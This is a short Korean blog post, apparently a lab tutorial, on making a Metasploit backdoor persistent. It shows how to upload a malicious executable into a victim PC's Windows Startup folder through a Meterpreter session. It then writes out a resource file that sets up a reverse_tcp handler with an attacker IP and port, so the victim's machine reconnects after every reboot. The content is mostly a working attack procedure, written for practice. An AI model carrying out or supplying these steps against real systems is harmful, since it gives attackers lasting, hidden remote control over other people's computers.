반응형




안녕들 하시죠 !


오늘은 지난번 게시물 'Backdoor malware 만들기'를 응용하여 피해자PC가 부팅 될때마다 세션이 연결되게 해보려고 합니다.


지난 게시물 msfconsole에서 피해자PC와 세션이 이어져 있는 상태에서부터 진행하겠습니다.


msfconsole에서 피해자PC의 C:\Users\hong\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 폴더로 이동해주세요.


여기서 주의할 점은 Start Menu 폴더로 들어갈때 쌍따옴표를 붙여줘야합니다. ( cd "Start Menu" )

폴더로 이동하신 후에 만든 악성파일을 upload 시키겠습니다.





이제 앞에서 줄줄이 작성했던 페이로드를 조금더 편한 리소스 파일로 만들겠습니다. ( 사실 처음부터 이렇게 할걸 그랬습니다... )

exit 명령어를 입력하시고 다시 kali linux root계정으로 나옵니다.

다음, vi hongpossible.rc 를 입력 하신 후에 i를 눌러 편집모드로 들어가주시구요.


use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp ( 페이로드 세팅 )

set lhost 192.168.0.132 ( 공격자 IP )

set lport 7777 ( 공격자 포트 )

exploit -j


를 작성 후 esc -> :wq 로 저장하고 빠져나옵니다.


그리고 난뒤에 msfconsole -q -r hongpossible.rc 로 리소스 파일을 실행 시켜주시면 피해자PC 세션에 연결되기를 기다리는 상태가됩니다.


피해자PC를 재부팅 해보겠습니다.



왼쪽 피해자PC의 시작프로그램에 보면 hongpossible.exe가 들어가 있고 재부팅하여 로그인을 하자마자 세션에 연결이 되는것을 볼수있습니다.


오늘은 여기까지 입니다 감사합니다 !





참고서적 이상한 「웹해킹 입문」 프리렉(2016) p172~191

studysecurity님의 블로그, Metasploit 실습2 참고

https://m.blog.naver.com/PostList.nhn?blogId=studysecurity

+ Recent posts